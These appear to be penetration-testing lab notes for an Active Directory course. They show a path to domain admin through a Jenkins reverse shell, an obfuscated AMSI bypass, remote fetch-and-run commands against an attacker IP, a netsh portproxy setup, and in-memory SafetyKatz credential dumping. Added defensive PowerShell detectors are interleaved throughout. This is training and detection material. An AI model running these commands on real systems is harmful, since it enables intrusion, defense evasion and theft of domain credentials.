# Evasion

### Lab 7 Scenario:

* Attack Path 1:
  * Student -> dcorp-ci via Jenkins
  * dcorp-ci is local admin on -> dcorp-mgmt
  * Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and used them to access dcorp-dc from Student.

* Attack Path 2 (Derivative Local Admin, or the shortest path to DA):
  * Student has local admin privileges on dcorp-adminsrv.
  * To extract credentials, we evaded AppLocker.
  * dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt.
  * We extracted domain admin credentials from dcorp-mgmt and used them to access dcorp-dc from Student.

* Student machine (student372) has exploited Jenkins to get a reverse shell on "dcorp\ciadmin"

* From dcorp\ciadmin, we disable Script Block Logging before running the AMSI bypass script. This is done to avoid PowerView being detected.

* We transfer PowerView to ciadmin to check domain sessions using `Find-DomainUserLocation` and find that there is a domain admin session on the dcorp-mgmt server.

* We can abuse this using WinRS or PSRemoting.

* **Abuse using WinRS**

  * We first check if we can execute commands on dcorp-mgmt and if the WinRM port is open.
  * Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt.
  * We want SafetyKatz.exe to run in memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin on ciadmin) to copy the Loader to dcorp-mgmt.
  * We also want to avoid the detection on dcorp-mgmt that calling a remote IP to download SafetyKatz would cause. So instead of directly calling the attacker IP, we port forward localhost to the attacker IP.
  * Since Defender would detect SafetyKatz even with NetLoader, we encode the arguments using ArgSplit.bat and copy the output into Safety.bat, which runs SafetyKatz.exe through the loader with the encoded arguments.
  * We download Safety.bat on ciadmin and xcopy it to dcorp-mgmt.
  * Finally, we use WinRS to run Safety.bat, which uses Loader.exe to download and execute SafetyKatz.exe in memory on dcorp-mgmt.
  * We get the credentials of svcadmin, a domain administrator.

* **Abuse using PSRemoting**
  * Check if we can execute commands on dcorp-mgmt using PSRemoting.
  * Download Invoke-Mimi.ps1 on dcorp-mgmt to dump hashes.
  * Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt).
  * After disabling it, we run Invoke-Command to call Invoke-Mimi on the session object we created while disabling AMSI.
  * We finally get the hashes.

* **Using Over-Pass-The-Hash**
  * We can use O-PTH to use svcadmin's credentials.
  * From an elevated shell, we can use Rubeus, SafetyKatz or Invoke-Mimi to start a process from the hash we obtained earlier and use it to access the domain controller.

* **Derivative Local Admin**
  * We are trying to find the machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess.
  * We find student372 has local admin access to dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372.
  * When we try to turn off script logging or bypass AMSI, it does not work because the PSRemoting session uses Constrained Language Mode (CLM).
  * We can check this using `$ExecutionContext.SessionState.LanguageMode`.
  * This is because of either AppLocker or WDAC (Windows Defender Application Control). Both of these are application allow-listing solutions from Microsoft. We can check the AppLocker policy using: `Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections`
  * We find that everyone can run scripts from the Program Files directory.
  * We can disable Defender and run any script in Program Files.
  * We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1, which adds "Invoke-Mimi -Command sekurlsa::ekeys" at the end of the Invoke-Mimi.ps1 file.
  * From the student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's Program Files directory.

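The two findings on dcorp-adminsrv (a remoting session in Constrained Language Mode, and an AppLocker path rule that lets Everyone run scripts out of Program Files) are exactly what a defender should audit for. The following is an added example written for this page, not part of the lab notes or of the AppLocker tooling: it reports the language mode and walks the effective AppLocker policy for Allow path rules whose target directory grants write or modify rights to broad principals. The function names and the path-variable expansion table are assumptions of this example; the cmdlets (`Get-AppLockerPolicy`, `Get-Acl`) are the real ones.

```powershell
# Added defensive audit; not part of the lab notes. Assumes a Windows host with the
# AppLocker cmdlets (Get-AppLockerPolicy) and an applied policy. Function names are mine.

function Test-ConstrainedLanguageMode {
    # CLM is what blocks dot-sourcing and in-session AMSI tampering; report it explicitly.
    $mode = $ExecutionContext.SessionState.LanguageMode
    [pscustomobject]@{ LanguageMode = $mode; Constrained = ($mode -eq 'ConstrainedLanguage') }
}

function Expand-AppLockerPath {
    # Translate AppLocker path variables into real folders so ACLs can be inspected.
    # Simplification: %PROGRAMFILES% is expanded to the 64-bit folder only.
    param([string]$Path)
    $expanded = $Path -replace '%PROGRAMFILES%', $env:ProgramFiles `
                      -replace '%WINDIR%',       $env:windir `
                      -replace '%SYSTEM32%',     "$env:windir\System32" `
                      -replace '%OSDRIVE%',      $env:SystemDrive
    # Drop the trailing wildcard so Get-Acl sees the directory itself.
    $expanded -replace '\\?\*$', ''
}

function Get-WritableAllowRule {
    # Flag Allow path rules whose directory grants write/modify to broad principals:
    # a script dropped there by a low-privileged user would satisfy the rule.
    $broad     = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    $policy    = Get-AppLockerPolicy -Effective
    foreach ($collection in $policy.RuleCollections) {
        foreach ($rule in $collection) {
            # Only file-path rules carry PathConditions; publisher and hash rules are skipped.
            if (-not ($rule.PSObject.Properties.Name -contains 'PathConditions')) { continue }
            if ($rule.Action -ne 'Allow') { continue }
            foreach ($cond in $rule.PathConditions) {
                $dir = Expand-AppLockerPath $cond.Path
                if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
                $acl = Get-Acl -LiteralPath $dir
                $writers = $acl.Access | Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $broad -contains $_.IdentityReference.Value -and
                    ($_.FileSystemRights -band $writeMask) -ne 0
                }
                if ($writers) {
                    [pscustomobject]@{
                        Collection = $collection.RuleCollectionType
                        Rule       = $rule.Name
                        Principal  = $rule.UserOrGroupSid
                        Path       = $cond.Path
                        Directory  = $dir
                        Writers    = ($writers.IdentityReference.Value | Sort-Object -Unique) -join ', '
                    }
                }
            }
        }
    }
}

Test-ConstrainedLanguageMode
Get-WritableAllowRule | Format-Table -AutoSize
```

One caveat the audit makes visible: a path rule is only as strong as the ACL on the path. In the lab the copy into Program Files succeeds because student372 is a local administrator on dcorp-adminsrv, and AppLocker is not a security boundary against local admins; the audit above catches the other, more common weakness, where a directory covered by an Allow rule is writable by ordinary users.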
## AMSI Bypass

First disable Enhanced Script Block Logging so that AMSI is not logged.

```powershell
iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing)
```

Then run the below command to bypass AMSI

{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

{% endcode %}
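From the blue-team side, the one-liner above is noisy precisely because of how it hides its intent: backticks splitting cmdlet and member names, `-f` format strings reassembling identifiers, and short string literals concatenated together. The following is an added example for this page, not part of the lab notes or of any tool it names: a scorer for those three tells plus reflection keywords, and a wrapper that runs it over Event ID 4104 (Script Block Logging, where the script text is `Properties[2]`) from the PowerShell operational log. Function names, the regexes and the threshold are assumptions of this example; the constructed sample string is inert text that does nothing when scored.

```powershell
# Added detection helper; not part of the lab notes. Function names, patterns and the
# threshold are mine. Event 4104 in Microsoft-Windows-PowerShell/Operational carries the
# script block text in Properties[2].

function Get-ScriptObfuscationScore {
    param([Parameter(Mandatory)][string]$ScriptText)
    $counts = [ordered]@{
        # A backtick between two letters splits a name ("S`eT-It`em"); clean code never needs it.
        BacktickInName = [regex]::Matches($ScriptText, '[A-Za-z]`[A-Za-z]').Count
        # "{1}{0}" -f 'x','y' reassembling a name out of fragments.
        FormatOperator = [regex]::Matches($ScriptText, '"\{\d+\}[^"]*"\s*-[fF]\b').Count
        # ('Am'+'si') style concatenation of very short literals.
        LiteralConcat  = [regex]::Matches($ScriptText, "'[^']{1,6}'\s*\+\s*'").Count
        # Reflection into loaded assemblies is the common tell for AMSI/logging tampering.
        Reflection     = [regex]::Matches($ScriptText, '(?i)GetField|GetType|NonPublic|SetValue').Count
    }
    $score = ($counts.Values | Measure-Object -Sum).Sum
    [pscustomobject]@{
        Score          = $score
        BacktickInName = $counts.BacktickInName
        FormatOperator = $counts.FormatOperator
        LiteralConcat  = $counts.LiteralConcat
        Reflection     = $counts.Reflection
        Suspicious     = ($score -ge 3)   # threshold is an assumption; tune on your own baseline
    }
}

function Get-SuspiciousScriptBlock {
    # Pull recent 4104 events and keep the blocks the scorer flags.
    param([int]$Hours = 24, [string]$ComputerName = $env:COMPUTERNAME)
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $r = Get-ScriptObfuscationScore -ScriptText $text
        if ($r.Suspicious) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Score   = $r.Score
                Preview = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

# Constructed sample (not from any real log, and not executable): two split names,
# one -f reassembly and one literal concatenation, which the scorer should flag.
$sample = 'I`nv`oke-Thing ("{1}{0}" -f ''b'',''a'') (''lo''+''ad'')'
Get-ScriptObfuscationScore -ScriptText $sample
Get-SuspiciousScriptBlock -Hours 24 | Format-Table -AutoSize
```

Ordering matters here: the `iex (iwr ...)` line that fetches the logging bypass is normally itself recorded as a 4104 event before the bypass takes effect, and the sudden absence of further 4104 events from a host that was producing them is a signal in its own right, so the wrapper should be run across all hosts with forwarded logs rather than only on the machine under suspicion.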

## NetLoader

Download Loader.exe on ciadmin and xcopy it to dcorp-mgmt.

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

{% endcode %}

## Port Forward Localhost:80 to Attacker Machine

{% code overflow="wrap" %}

```powershell
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"
```

{% endcode %}
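The portproxy rule above survives reboots because netsh stores it in the registry and the IP Helper service (iphlpsvc) re-creates the listener, which also means it is easy to enumerate. The following is an added example for this page, not part of the lab notes: it reads the persisted v4tov4 TCP entries, marks any that forward off the host, and produces the matching `netsh ... delete` command for cleanup. The function name and the registry layout (one value per proxy under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, value name `listenaddress/listenport`, data `connectaddress/connectport`) are stated as assumptions of this example.

```powershell
# Added detection helper; not part of the lab notes. Assumed registry layout:
#   HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
#   value name "listenaddress/listenport", value data "connectaddress/connectport"

function Get-PortProxyEntry {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (-not (Test-Path -LiteralPath $key)) { return }   # no proxy was ever configured
    $item = Get-ItemProperty -LiteralPath $key
    foreach ($prop in $item.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }          # skip PSPath, PSParentPath, ...
        $la, $lp = $prop.Name -split '/', 2
        $ca, $cp = [string]$prop.Value -split '/', 2
        [pscustomobject]@{
            ListenAddress  = $la
            ListenPort     = [int]$lp
            ConnectAddress = $ca
            ConnectPort    = [int]$cp
            # A connect address that is not loopback pushes traffic off the box.
            OffHost        = ($ca -notin '127.0.0.1', 'localhost', '::1')
            # Exact netsh syntax to remove this entry during cleanup.
            Remove         = "netsh interface portproxy delete v4tov4 listenaddress=$la listenport=$lp"
        }
    }
}

# Local run, then the same check against a remote host over an existing remoting path.
Get-PortProxyEntry | Format-Table -AutoSize
# Invoke-Command -ComputerName dcorp-mgmt -ScriptBlock ${function:Get-PortProxyEntry}
```

Two cross-checks round this out: `netsh interface portproxy show all` should agree with the registry view, and in `netstat -ano` the listening port is owned by an svchost.exe hosting iphlpsvc rather than by any application, which is unusual enough on a server to alert on. Process-creation logging (Event ID 4688 with command-line auditing, or Sysmon Event ID 1) for `netsh.exe` with `portproxy` in the command line catches the rule at creation time.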

## Running SafetyKatz.bat

### Use Loader without Encoding

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

{% endcode %}

### Use Loader after Encoding (Safety.bat)

Encode the SafetyKatz arguments using **ArgSplit.bat**:

```
C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
```

Include Argsplit output in **Safety.bat**

```batch
@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit
```

### Download & Execute SafetyKatz.exe in-memory

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat

echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat

$null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat"
```

{% endcode %}

## PowerShell Remoting

Check if we can run commands on dcorp-mgmt using PSRemoting:

{% code overflow="wrap" %}

```powershell
Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt
```

{% endcode %}

Use Invoke-Mimi to dump hashes of domain admin svcadmin:

{% code overflow="wrap" %}

```powershell
iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)
```

{% endcode %}

### Disable AMSI using Set-MpPreference

```powershell
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```
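`Set-MpPreference -DisableIOAVProtection $true` is a configuration change, and Defender records every such change as Event ID 5007 in its operational log, so this step is visible to anyone watching that log; it is also blocked outright when Tamper Protection is enabled. The following is an added example for this page, not part of the lab notes: it reports the current state of the switches an operator would flip, whether Tamper Protection is on, and the recent 5007 events, and can be pushed through an existing session such as `$sess` with the same `${function:...}` idiom the page uses. The function names are assumptions of this example; `Get-MpPreference`, `Get-MpComputerStatus`, `Get-WinEvent` and Event ID 5007 are the real interfaces.

```powershell
# Added defensive check; not part of the lab notes. Function names are mine. Event 5007
# ("antimalware platform configuration changed") is Defender's own record of such changes.

function Get-DefenderTamperState {
    # Each Disable* switch is False on a healthy host; any True is a finding.
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    [pscustomobject]@{
        Computer                  = $env:COMPUTERNAME
        DisableIOAVProtection     = $pref.DisableIOAVProtection
        DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring
        DisableScriptScanning     = $pref.DisableScriptScanning
        DisableBehaviorMonitoring = $pref.DisableBehaviorMonitoring
        # With Tamper Protection on, Set-MpPreference cannot flip the protected switches.
        TamperProtection          = $status.IsTamperProtected
        RealTimeEnabled           = $status.RealTimeProtectionEnabled
    }
}

function Get-DefenderConfigChange {
    # Event 5007 carries the changed setting with its old and new value in the message.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'Change'; e = { $_.Message -replace '\s+', ' ' } }
}

# Local run; the commented lines push the same checks through an existing PSSession.
Get-DefenderTamperState
Get-DefenderConfigChange | Format-Table -AutoSize -Wrap
# Invoke-Command -Session $sess -ScriptBlock ${function:Get-DefenderTamperState}
# Invoke-Command -Session $sess -ScriptBlock ${function:Get-DefenderConfigChange}
```

Pairing the 5007 event with the WinRM logon that preceded it (the remoting session is a network logon from ciadmin's host) gives the responder the full chain: who connected, from where, and which protection they switched off.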

Run Invoke-Mimi and get hashes

```powershell
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess
```

